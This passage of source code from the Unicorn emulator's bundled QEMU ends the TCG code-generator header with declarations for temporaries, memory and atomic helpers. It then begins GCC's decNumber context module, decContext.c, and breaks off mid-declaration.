return (TCGv_i32)((char *)t - (char *)tcg_ctx); } static inline TCGv_i64 temp_tcgv_i64(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_i64)temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_ptr temp_tcgv_ptr(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_ptr)temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_vec temp_tcgv_vec(TCGContext *tcg_ctx, TCGTemp *t) { return (TCGv_vec)temp_tcgv_i32(tcg_ctx, t); } #if TCG_TARGET_REG_BITS == 32 static inline TCGv_i32 TCGV_LOW(TCGContext *tcg_ctx, TCGv_i64 t) { return temp_tcgv_i32(tcg_ctx, tcgv_i64_temp(tcg_ctx, t)); } static inline TCGv_i32 TCGV_HIGH(TCGContext *tcg_ctx, TCGv_i64 t) { return temp_tcgv_i32(tcg_ctx, tcgv_i64_temp(tcg_ctx, t) + 1); } #endif static inline void tcg_set_insn_param(TCGOp *op, int arg, TCGArg v) { op->args[arg] = v; } static inline void tcg_set_insn_start_param(TCGOp *op, int arg, target_ulong v) { #if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS tcg_set_insn_param(op, arg, v); #else tcg_set_insn_param(op, arg * 2, v); tcg_set_insn_param(op, arg * 2 + 1, v >> 32); #endif } /* The last op that was emitted. */ static inline TCGOp *tcg_last_op(TCGContext *tcg_ctx) { return QTAILQ_LAST(&tcg_ctx->ops); } /* Test for whether to terminate the TB for using too many opcodes. */ static inline bool tcg_op_buf_full(TCGContext *tcg_ctx) { /* This is not a hard limit, it merely stops translation when * we have produced "enough" opcodes. We want to limit TB size * such that a RISC host can reasonably use a 16-bit signed * branch within the TB. We also need to be mindful of the * 16-bit unsigned offsets, TranslationBlock.jmp_reset_offset[] * and TCGContext.gen_insn_end_off[]. */ return tcg_ctx->nb_ops >= 4000; } /* pool based memory allocation */ /* user-mode: mmap_lock must be held for tcg_malloc_internal. 
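*/
/* Added illustration (hypothetical helper, not in the original header):
   the offset encoding above makes temp <-> TCGv conversion a pure offset
   calculation, so a round trip must return the same temp. */
static inline void tcgv_offset_roundtrip_demo(TCGContext *tcg_ctx, TCGTemp *t)
{
    TCGv_i32 v = temp_tcgv_i32(tcg_ctx, t);            /* temp -> handle */
    tcg_debug_assert(tcgv_i32_temp(tcg_ctx, v) == t);  /* handle -> temp */
}
/*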
*/ void *tcg_malloc_internal(TCGContext *s, int size); void tcg_pool_reset(TCGContext *s); TranslationBlock *tcg_tb_alloc(TCGContext *s); void tcg_region_init(TCGContext *tcg_ctx); void tcg_region_reset_all(TCGContext *tcg_ctx); size_t tcg_code_size(TCGContext *tcg_ctx); size_t tcg_code_capacity(TCGContext *tcg_ctx); void tcg_tb_insert(TCGContext *tcg_ctx, TranslationBlock *tb); void tcg_tb_remove(TCGContext *tcg_ctx, TranslationBlock *tb); size_t tcg_tb_phys_invalidate_count(TCGContext *tcg_ctx); TranslationBlock *tcg_tb_lookup(TCGContext *tcg_ctx, uintptr_t tc_ptr); /* glib gtree: * gboolean (*GTraverseFunc) (gpointer key, gpointer value, gpointer data); */ typedef int (*GTraverseFunc) (void *key, void *value, void *data); void tcg_tb_foreach(TCGContext *tcg_ctx, GTraverseFunc func, gpointer user_data); size_t tcg_nb_tbs(TCGContext *tcg_ctx); /* user-mode: Called with mmap_lock held. */ static inline void *tcg_malloc(TCGContext *tcg_ctx, int size) { TCGContext *s = tcg_ctx; uint8_t *ptr, *ptr_end; /* ??? This is a weak placeholder for minimum malloc alignment. */ size = QEMU_ALIGN_UP(size, 8); ptr = s->pool_cur; ptr_end = ptr + size; if (unlikely(ptr_end > s->pool_end)) { return tcg_malloc_internal(tcg_ctx, size); } else { s->pool_cur = ptr_end; return ptr; } } void tcg_context_init(TCGContext *s); void tcg_register_thread(void); void tcg_prologue_init(TCGContext *s); void tcg_func_start(TCGContext *s); int tcg_gen_code(TCGContext *s, TranslationBlock *tb); void tcg_set_frame(TCGContext *s, TCGReg reg, intptr_t start, intptr_t size); TCGTemp *tcg_global_mem_new_internal(TCGContext *tcg_ctx, TCGType, TCGv_ptr, intptr_t, const char *); TCGTemp *tcg_temp_new_internal(TCGContext *tcg_ctx, TCGType, bool); void tcg_temp_free_internal(TCGContext *tcg_ctx, TCGTemp *); TCGv_vec tcg_temp_new_vec(TCGContext *tcg_ctx, TCGType type); TCGv_vec tcg_temp_new_vec_matching(TCGContext *tcg_ctx, TCGv_vec match); static inline void tcg_temp_free_i32(TCGContext *tcg_ctx, TCGv_i32 arg) { tcg_temp_free_internal(tcg_ctx, tcgv_i32_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_i64(TCGContext *tcg_ctx, TCGv_i64 arg) { tcg_temp_free_internal(tcg_ctx, tcgv_i64_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_ptr(TCGContext *tcg_ctx, TCGv_ptr arg) { tcg_temp_free_internal(tcg_ctx, tcgv_ptr_temp(tcg_ctx, arg)); } static inline void tcg_temp_free_vec(TCGContext *tcg_ctx, TCGv_vec arg) { tcg_temp_free_internal(tcg_ctx, tcgv_vec_temp(tcg_ctx, arg)); } static inline TCGv_i32 tcg_global_mem_new_i32(TCGContext *tcg_ctx, TCGv_ptr reg, intptr_t offset, const char *name) { TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_I32, reg, offset, name); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i32 tcg_temp_new_i32(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I32, false); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i32 tcg_temp_local_new_i32(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I32, true); return temp_tcgv_i32(tcg_ctx, t); } static inline TCGv_i64 tcg_global_mem_new_i64(TCGContext *tcg_ctx, TCGv_ptr reg, intptr_t offset, const char *name) { TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_I64, reg, offset, name); return temp_tcgv_i64(tcg_ctx, t); } static inline TCGv_i64 tcg_temp_new_i64(TCGContext *tcg_ctx) { TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I64, false); return temp_tcgv_i64(tcg_ctx, t); } static inline TCGv_i64 tcg_temp_local_new_i64(TCGContext *tcg_ctx) { TCGTemp *t = 
tcg_temp_new_internal(tcg_ctx, TCG_TYPE_I64, true);
    return temp_tcgv_i64(tcg_ctx, t);
}

static inline TCGv_ptr tcg_global_mem_new_ptr(TCGContext *tcg_ctx, TCGv_ptr reg,
                                              intptr_t offset, const char *name)
{
    TCGTemp *t = tcg_global_mem_new_internal(tcg_ctx, TCG_TYPE_PTR, reg, offset, name);
    return temp_tcgv_ptr(tcg_ctx, t);
}

static inline TCGv_ptr tcg_temp_new_ptr(TCGContext *tcg_ctx)
{
    TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_PTR, false);
    return temp_tcgv_ptr(tcg_ctx, t);
}

static inline TCGv_ptr tcg_temp_local_new_ptr(TCGContext *tcg_ctx)
{
    TCGTemp *t = tcg_temp_new_internal(tcg_ctx, TCG_TYPE_PTR, true);
    return temp_tcgv_ptr(tcg_ctx, t);
}

#if defined(CONFIG_DEBUG_TCG)
/* If you call tcg_clear_temp_count() at the start of a section of
 * code which is not supposed to leak any TCG temporaries, then
 * calling tcg_check_temp_count() at the end of the section will
 * return 1 if the section did in fact leak a temporary.
 */
void tcg_clear_temp_count(void);
int tcg_check_temp_count(void);
#else
#define tcg_clear_temp_count() do { } while (0)
#define tcg_check_temp_count() 0
#endif

int64_t tcg_cpu_exec_time(void);

#define TCG_CT_ALIAS  0x80
#define TCG_CT_IALIAS 0x40
#define TCG_CT_NEWREG 0x20 /* output requires a new register */
#define TCG_CT_REG    0x01
#define TCG_CT_CONST  0x02 /* any constant of register size */

typedef struct TCGArgConstraint {
    uint16_t ct;
    uint8_t alias_index;
    union {
        TCGRegSet regs;
    } u;
} TCGArgConstraint;

#define TCG_MAX_OP_ARGS 16

/* Bits for TCGOpDef->flags, 8 bits available.  */
enum {
    /* Instruction exits the translation block.  */
    TCG_OPF_BB_EXIT      = 0x01,
    /* Instruction defines the end of a basic block.  */
    TCG_OPF_BB_END       = 0x02,
    /* Instruction clobbers call registers and potentially updates globals.  */
    TCG_OPF_CALL_CLOBBER = 0x04,
    /* Instruction has side effects: it cannot be removed if its outputs
       are not used, and might trigger exceptions.  */
    TCG_OPF_SIDE_EFFECTS = 0x08,
    /* Instruction operands are 64-bits (otherwise 32-bits).  */
    TCG_OPF_64BIT        = 0x10,
    /* Instruction is optional and not implemented by the host, or insn
       is generic and should not be implemented by the host.  */
    TCG_OPF_NOT_PRESENT  = 0x20,
    /* Instruction operands are vectors.
*/ TCG_OPF_VECTOR = 0x40, }; typedef struct TCGOpDef { const char *name; uint8_t nb_oargs, nb_iargs, nb_cargs, nb_args; uint8_t flags; TCGArgConstraint *args_ct; int *sorted_args; #if defined(CONFIG_DEBUG_TCG) int used; #endif } TCGOpDef; typedef struct TCGTargetOpDef { TCGOpcode op; const char *args_ct_str[TCG_MAX_OP_ARGS]; } TCGTargetOpDef; #ifndef NDEBUG #define tcg_abort() \ do {\ fprintf(stderr, "%s:%d: tcg fatal error\n", __FILE__, __LINE__);\ abort();\ } while (0) #else #define tcg_abort() abort() #endif bool tcg_op_supported(TCGOpcode op); void tcg_gen_callN(TCGContext *tcg_ctx, void *func, TCGTemp *ret, int nargs, TCGTemp **args); TCGOp *tcg_emit_op(TCGContext *tcg_ctx, TCGOpcode opc); void tcg_op_remove(TCGContext *s, TCGOp *op); TCGOp *tcg_op_insert_before(TCGContext *s, TCGOp *op, TCGOpcode opc); TCGOp *tcg_op_insert_after(TCGContext *s, TCGOp *op, TCGOpcode opc); void tcg_optimize(TCGContext *s); TCGv_i32 tcg_const_i32(TCGContext *tcg_ctx, int32_t val); TCGv_i64 tcg_const_i64(TCGContext *tcg_ctx, int64_t val); TCGv_i32 tcg_const_local_i32(TCGContext *tcg_ctx, int32_t val); TCGv_i64 tcg_const_local_i64(TCGContext *tcg_ctx, int64_t val); TCGv_vec tcg_const_zeros_vec(TCGContext *tcg_ctx, TCGType); TCGv_vec tcg_const_ones_vec(TCGContext *tcg_ctx, TCGType); TCGv_vec tcg_const_zeros_vec_matching(TCGContext *tcg_ctx, TCGv_vec); TCGv_vec tcg_const_ones_vec_matching(TCGContext *tcg_ctx, TCGv_vec); #if UINTPTR_MAX == UINT32_MAX # define tcg_const_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_i32(tcg_ctx, (intptr_t)(x))) # define tcg_const_local_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_local_i32(tcg_ctx, (intptr_t)(x))) #else # define tcg_const_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_i64(tcg_ctx, (intptr_t)(x))) # define tcg_const_local_ptr(tcg_ctx, x) ((TCGv_ptr)tcg_const_local_i64(tcg_ctx, (intptr_t)(x))) #endif TCGLabel *gen_new_label(TCGContext *tcg_ctx); /** * label_arg * @l: label * * Encode a label for storage in the TCG opcode stream. */ static inline TCGArg label_arg(TCGLabel *l) { return (uintptr_t)l; } /** * arg_label * @i: value * * The opposite of label_arg. Retrieve a label from the * encoding of the TCG opcode stream. */ static inline TCGLabel *arg_label(TCGArg i) { return (TCGLabel *)(uintptr_t)i; } /** * tcg_ptr_byte_diff * @a, @b: addresses to be differenced * * There are many places within the TCG backends where we need a byte * difference between two pointers. While this can be accomplished * with local casting, it's easy to get wrong -- especially if one is * concerned with the signedness of the result. * * This version relies on GCC's void pointer arithmetic to get the * correct result. */ static inline ptrdiff_t tcg_ptr_byte_diff(void *a, void *b) { return (char *)a - (char *)b; } /** * tcg_pcrel_diff * @s: the tcg context * @target: address of the target * * Produce a pc-relative difference, from the current code_ptr * to the destination address. */ static inline ptrdiff_t tcg_pcrel_diff(TCGContext *s, void *target) { return tcg_ptr_byte_diff(target, s->code_ptr); } /** * tcg_current_code_size * @s: the tcg context * * Compute the current code size within the translation block. * This is used to fill in qemu's data structures for goto_tb. */ static inline size_t tcg_current_code_size(TCGContext *s) { return tcg_ptr_byte_diff(s->code_ptr, s->code_buf); } /* Combine the MemOp and mmu_idx parameters into a single value. */ typedef uint32_t TCGMemOpIdx; /** * make_memop_idx * @op: memory operation * @idx: mmu index * * Encode these values into a single parameter. 
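 *
 * For example, make_memop_idx(MO_LEUL, 3) yields (MO_LEUL << 4) | 3, from
 * which get_memop and get_mmuidx below recover the two fields.  (Added
 * worked example, not in the original comment.)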
*/
static inline TCGMemOpIdx make_memop_idx(MemOp op, unsigned idx)
{
    tcg_debug_assert(idx <= 15);
    return (op << 4) | idx;
}

/**
 * get_memop
 * @oi: combined op/idx parameter
 *
 * Extract the memory operation from the combined value.
 */
static inline MemOp get_memop(TCGMemOpIdx oi)
{
    return oi >> 4;
}

/**
 * get_mmuidx
 * @oi: combined op/idx parameter
 *
 * Extract the mmu index from the combined value.
 */
static inline unsigned get_mmuidx(TCGMemOpIdx oi)
{
    return oi & 15;
}

/**
 * tcg_qemu_tb_exec:
 * @env: pointer to CPUArchState for the CPU
 * @tb_ptr: address of generated code for the TB to execute
 *
 * Start executing code from a given translation block.
 * Where translation blocks have been linked, execution
 * may proceed from the given TB into successive ones.
 * Control eventually returns only when some action is needed
 * from the top-level loop: either control must pass to a TB
 * which has not yet been directly linked, or an asynchronous
 * event such as an interrupt needs handling.
 *
 * Return: The return value is the value passed to the corresponding
 * tcg_gen_exit_tb() at translation time of the last TB attempted to execute.
 * The value is either zero or a 4-byte aligned pointer to that TB combined
 * with additional information in its two least significant bits. The
 * additional information is encoded as follows:
 *  0, 1: the link between this TB and the next is via the specified
 *        TB index (0 or 1). That is, we left the TB via (the equivalent
 *        of) "goto_tb <index>". The main loop uses this to determine
 *        how to link the TB just executed to the next.
 *  2:    we are using instruction counting code generation, and we
 *        did not start executing this TB because the instruction counter
 *        would hit zero midway through it. In this case the pointer
 *        returned is the TB we were about to execute, and the caller must
 *        arrange to execute the remaining count of instructions.
 *  3:    we stopped because the CPU's exit_request flag was set
 *        (usually meaning that there is an interrupt that needs to be
 *        handled). The pointer returned is the TB we were about to execute
 *        when we noticed the pending exit request.
 *
 * If the bottom two bits indicate an exit-via-index then the CPU
 * state is correctly synchronised and ready for execution of the next
 * TB (and in particular the guest PC is the address to execute next).
 * Otherwise, we gave up on execution of this TB before it started, and
 * the caller must fix up the CPU state by calling the CPU's
 * synchronize_from_tb() method with the TB pointer we return (falling
 * back to calling the CPU's set_pc method with tb->pc if no
 * synchronize_from_tb() method exists).
 *
 * Note that TCG targets may use a different definition of tcg_qemu_tb_exec
 * to this default (which just calls the prologue.code emitted by
 * tcg_target_qemu_prologue()).
 */
#define TB_EXIT_MASK      3
#define TB_EXIT_IDX0      0
#define TB_EXIT_IDX1      1
#define TB_EXIT_IDXMAX    1
#define TB_EXIT_REQUESTED 3

#ifdef HAVE_TCG_QEMU_TB_EXEC
uintptr_t tcg_qemu_tb_exec(CPUArchState *env, uint8_t *tb_ptr);
#else
# define tcg_qemu_tb_exec(env, tb_ptr) \
    ((uintptr_t (*)(void *, void *))env->uc->tcg_ctx->code_gen_prologue)(env, tb_ptr)
#endif

void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size);

#if TCG_TARGET_MAYBE_vec
/* Return zero if the tuple (opc, type, vece) is unsupportable;
   return > 0 if it is directly supportable;
   return < 0 if we must call tcg_expand_vec_op.
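*/
/* Added sketch (hypothetical helper, not in the original header): decode
   the value returned by tcg_qemu_tb_exec according to the contract
   documented above.  Placed here purely for illustration. */
static inline int tb_exit_reason_demo(uintptr_t tb_exec_ret)
{
    return (int)(tb_exec_ret & TB_EXIT_MASK); /* 0/1: goto_tb index; 3: exit requested */
}
/*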
*/
int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned);
#else
static inline int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode o, TCGType t, unsigned ve)
{
    return 0;
}
#endif

/* Expand the tuple (opc, type, vece) on the given arguments.  */
void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode, TCGType, unsigned, TCGArg, ...);

/* Replicate a constant C according to the log2 of the element size.  */
uint64_t dup_const_func(unsigned vece, uint64_t c);

#ifndef _MSC_VER
#define dup_const(VECE, C)                                         \
    (__builtin_constant_p(VECE)                                    \
     ? (  (VECE) == MO_8  ? 0x0101010101010101ull * (uint8_t)(C)   \
        : (VECE) == MO_16 ? 0x0001000100010001ull * (uint16_t)(C)  \
        : (VECE) == MO_32 ? 0x0000000100000001ull * (uint32_t)(C)  \
        : dup_const_func(VECE, C))                                 \
     : dup_const_func(VECE, C))
#else
#define dup_const(VECE, C) dup_const_func(VECE, C)
#endif

/*
 * Memory helpers that will be used by TCG generated code.
 */
/* Value zero-extended to tcg register size.  */
tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr,
                                     TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr,
                           TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr,
                           TCGMemOpIdx oi, uintptr_t retaddr);

/* Value sign-extended to tcg register size.  */
tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr,
                                     TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr,
                                    TCGMemOpIdx oi, uintptr_t retaddr);

void helper_ret_stb_mmu(CPUArchState *env, target_ulong addr, uint8_t val,
                        TCGMemOpIdx oi, uintptr_t retaddr);
void helper_le_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);
void helper_le_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);
void helper_le_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);
void helper_be_stw_mmu(CPUArchState *env, target_ulong addr, uint16_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);
void helper_be_stl_mmu(CPUArchState *env, target_ulong addr, uint32_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);
void helper_be_stq_mmu(CPUArchState *env, target_ulong addr, uint64_t val,
                       TCGMemOpIdx oi, uintptr_t retaddr);

/* Temporary aliases until backends are converted.
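*/
/* Added worked example (not part of the original header): with VECE == MO_8,
   dup_const(MO_8, 0xAB) evaluates 0x0101010101010101ull * 0xAB, i.e.
   0xABABABABABABABAB -- the byte replicated across all eight lanes. */
/*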
*/
#ifdef TARGET_WORDS_BIGENDIAN
# define helper_ret_ldsw_mmu  helper_be_ldsw_mmu
# define helper_ret_lduw_mmu  helper_be_lduw_mmu
# define helper_ret_ldsl_mmu  helper_be_ldsl_mmu
# define helper_ret_ldul_mmu  helper_be_ldul_mmu
# define helper_ret_ldl_mmu   helper_be_ldul_mmu
# define helper_ret_ldq_mmu   helper_be_ldq_mmu
# define helper_ret_stw_mmu   helper_be_stw_mmu
# define helper_ret_stl_mmu   helper_be_stl_mmu
# define helper_ret_stq_mmu   helper_be_stq_mmu
#else
# define helper_ret_ldsw_mmu  helper_le_ldsw_mmu
# define helper_ret_lduw_mmu  helper_le_lduw_mmu
# define helper_ret_ldsl_mmu  helper_le_ldsl_mmu
# define helper_ret_ldul_mmu  helper_le_ldul_mmu
# define helper_ret_ldl_mmu   helper_le_ldul_mmu
# define helper_ret_ldq_mmu   helper_le_ldq_mmu
# define helper_ret_stw_mmu   helper_le_stw_mmu
# define helper_ret_stl_mmu   helper_le_stl_mmu
# define helper_ret_stq_mmu   helper_le_stq_mmu
#endif

uint32_t helper_atomic_cmpxchgb_mmu(CPUArchState *env, target_ulong addr,
                                    uint32_t cmpv, uint32_t newv,
                                    TCGMemOpIdx oi, uintptr_t retaddr);
uint32_t helper_atomic_cmpxchgw_le_mmu(CPUArchState *env, target_ulong addr,
                                       uint32_t cmpv, uint32_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);
uint32_t helper_atomic_cmpxchgl_le_mmu(CPUArchState *env, target_ulong addr,
                                       uint32_t cmpv, uint32_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);
uint64_t helper_atomic_cmpxchgq_le_mmu(CPUArchState *env, target_ulong addr,
                                       uint64_t cmpv, uint64_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);
uint32_t helper_atomic_cmpxchgw_be_mmu(CPUArchState *env, target_ulong addr,
                                       uint32_t cmpv, uint32_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);
uint32_t helper_atomic_cmpxchgl_be_mmu(CPUArchState *env, target_ulong addr,
                                       uint32_t cmpv, uint32_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);
uint64_t helper_atomic_cmpxchgq_be_mmu(CPUArchState *env, target_ulong addr,
                                       uint64_t cmpv, uint64_t newv,
                                       TCGMemOpIdx oi, uintptr_t retaddr);

#define GEN_ATOMIC_HELPER(NAME, TYPE, SUFFIX)         \
    TYPE helper_atomic_ ## NAME ## SUFFIX ## _mmu     \
    (CPUArchState *env, target_ulong addr, TYPE val,  \
     TCGMemOpIdx oi, uintptr_t retaddr);

#ifdef CONFIG_ATOMIC64
#define GEN_ATOMIC_HELPER_ALL(NAME)          \
    GEN_ATOMIC_HELPER(NAME, uint32_t, b)     \
    GEN_ATOMIC_HELPER(NAME, uint32_t, w_le)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, w_be)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, l_le)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, l_be)  \
    GEN_ATOMIC_HELPER(NAME, uint64_t, q_le)  \
    GEN_ATOMIC_HELPER(NAME, uint64_t, q_be)
#else
#define GEN_ATOMIC_HELPER_ALL(NAME)          \
    GEN_ATOMIC_HELPER(NAME, uint32_t, b)     \
    GEN_ATOMIC_HELPER(NAME, uint32_t, w_le)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, w_be)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, l_le)  \
    GEN_ATOMIC_HELPER(NAME, uint32_t, l_be)
#endif

GEN_ATOMIC_HELPER_ALL(fetch_add)
GEN_ATOMIC_HELPER_ALL(fetch_sub)
GEN_ATOMIC_HELPER_ALL(fetch_and)
GEN_ATOMIC_HELPER_ALL(fetch_or)
GEN_ATOMIC_HELPER_ALL(fetch_xor)
GEN_ATOMIC_HELPER_ALL(fetch_smin)
GEN_ATOMIC_HELPER_ALL(fetch_umin)
GEN_ATOMIC_HELPER_ALL(fetch_smax)
GEN_ATOMIC_HELPER_ALL(fetch_umax)

GEN_ATOMIC_HELPER_ALL(add_fetch)
GEN_ATOMIC_HELPER_ALL(sub_fetch)
GEN_ATOMIC_HELPER_ALL(and_fetch)
GEN_ATOMIC_HELPER_ALL(or_fetch)
GEN_ATOMIC_HELPER_ALL(xor_fetch)
GEN_ATOMIC_HELPER_ALL(smin_fetch)
GEN_ATOMIC_HELPER_ALL(umin_fetch)
GEN_ATOMIC_HELPER_ALL(smax_fetch)
GEN_ATOMIC_HELPER_ALL(umax_fetch)

GEN_ATOMIC_HELPER_ALL(xchg)

#undef GEN_ATOMIC_HELPER_ALL
#undef GEN_ATOMIC_HELPER

/*
 * These aren't really "proper" helpers because TCG cannot manage Int128.
 * However, use the same format as the others, for use by the backends.
 *
 * The cmpxchg functions are only defined if HAVE_CMPXCHG128;
 * the ld/st functions are only defined if HAVE_ATOMIC128,
 * as defined by <qemu/atomic128.h>.
 */
Int128 helper_atomic_cmpxchgo_le_mmu(CPUArchState *env, target_ulong addr,
                                     Int128 cmpv, Int128 newv,
                                     TCGMemOpIdx oi, uintptr_t retaddr);
Int128 helper_atomic_cmpxchgo_be_mmu(CPUArchState *env, target_ulong addr,
                                     Int128 cmpv, Int128 newv,
                                     TCGMemOpIdx oi, uintptr_t retaddr);

Int128 helper_atomic_ldo_le_mmu(CPUArchState *env, target_ulong addr,
                                TCGMemOpIdx oi, uintptr_t retaddr);
Int128 helper_atomic_ldo_be_mmu(CPUArchState *env, target_ulong addr,
                                TCGMemOpIdx oi, uintptr_t retaddr);
void helper_atomic_sto_le_mmu(CPUArchState *env, target_ulong addr, Int128 val,
                              TCGMemOpIdx oi, uintptr_t retaddr);
void helper_atomic_sto_be_mmu(CPUArchState *env, target_ulong addr, Int128 val,
                              TCGMemOpIdx oi, uintptr_t retaddr);

#ifdef CONFIG_DEBUG_TCG
void tcg_assert_listed_vecop(TCGOpcode);
#else
static inline void tcg_assert_listed_vecop(TCGOpcode op) { }
#endif

static inline const TCGOpcode *tcg_swap_vecop_list(const TCGOpcode *n)
{
#ifdef CONFIG_DEBUG_TCG
    const TCGOpcode *o = tcg_ctx->vecop_list;
    tcg_ctx->vecop_list = n;
    return o;
#else
    return NULL;
#endif
}

bool tcg_can_emit_vecop_list(TCGContext *tcg_ctx, const TCGOpcode *, TCGType, unsigned);

void check_exit_request(TCGContext *tcg_ctx);

void tcg_dump_ops(TCGContext *s, bool have_prefs, const char *headline);

struct jit_code_entry {
    struct jit_code_entry *next_entry;
    struct jit_code_entry *prev_entry;
    const void *symfile_addr;
    uint64_t symfile_size;
};

void uc_del_inline_hook(uc_engine *uc, struct hook *hk);
void uc_add_inline_hook(uc_engine *uc, struct hook *hk, void** args, int args_len);

#endif /* TCG_H */

/* ------------------------------------------------------------------ */
/* File: unicorn-2.1.1/qemu/libdecnumber/decContext.c                 */
/* ------------------------------------------------------------------ */

/* Decimal context module for the decNumber C Library.
   Copyright (C) 2005, 2007 Free Software Foundation, Inc.
   Contributed by IBM Corporation.  Author Mike Cowlishaw.

   This file is part of GCC.
GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Context module */ /* ------------------------------------------------------------------ */ /* This module comprises the routines for handling arithmetic */ /* context structures. */ /* ------------------------------------------------------------------ */ #include "qemu/osdep.h" #include "libdecnumber/dconfig.h" #include "libdecnumber/decContext.h" #include "libdecnumber/decNumberLocal.h" #if DECCHECK /* compile-time endian tester [assumes sizeof(Int)>1] */ static const Int mfcone=1; /* constant 1 */ static const Flag *mfctop=(Flag *)&mfcone; /* -> top byte */ #define LITEND *mfctop /* named flag; 1=little-endian */ #endif /* ------------------------------------------------------------------ */ /* round-for-reround digits */ /* ------------------------------------------------------------------ */ const uByte DECSTICKYTAB[10]={1,1,2,3,4,6,6,7,8,9}; /* used if sticky */ /* ------------------------------------------------------------------ */ /* Powers of ten (powers[n]==10**n, 0<=n<=9) */ /* ------------------------------------------------------------------ */ const uLong DECPOWERS[19] = {1, 10, 100, 1000, 10000, 100000, 1000000, 10000000, 100000000, 1000000000, 10000000000ULL, 100000000000ULL, 1000000000000ULL, 10000000000000ULL, 100000000000000ULL, 1000000000000000ULL, 10000000000000000ULL, 100000000000000000ULL, 1000000000000000000ULL, }; /* ------------------------------------------------------------------ */ /* decContextClearStatus -- clear bits in current status */ /* */ /* context is the context structure to be queried */ /* mask indicates the bits to be cleared (the status bit that */ /* corresponds to each 1 bit in the mask is cleared) */ /* returns context */ /* */ /* No error is possible. 
*/ /* ------------------------------------------------------------------ */ decContext *decContextClearStatus(decContext *context, uInt mask) { context->status&=~mask; return context; } /* decContextClearStatus */ /* ------------------------------------------------------------------ */ /* decContextDefault -- initialize a context structure */ /* */ /* context is the structure to be initialized */ /* kind selects the required set of default values, one of: */ /* DEC_INIT_BASE -- select ANSI X3-274 defaults */ /* DEC_INIT_DECIMAL32 -- select IEEE 754r defaults, 32-bit */ /* DEC_INIT_DECIMAL64 -- select IEEE 754r defaults, 64-bit */ /* DEC_INIT_DECIMAL128 -- select IEEE 754r defaults, 128-bit */ /* For any other value a valid context is returned, but with */ /* Invalid_operation set in the status field. */ /* returns a context structure with the appropriate initial values. */ /* ------------------------------------------------------------------ */ decContext 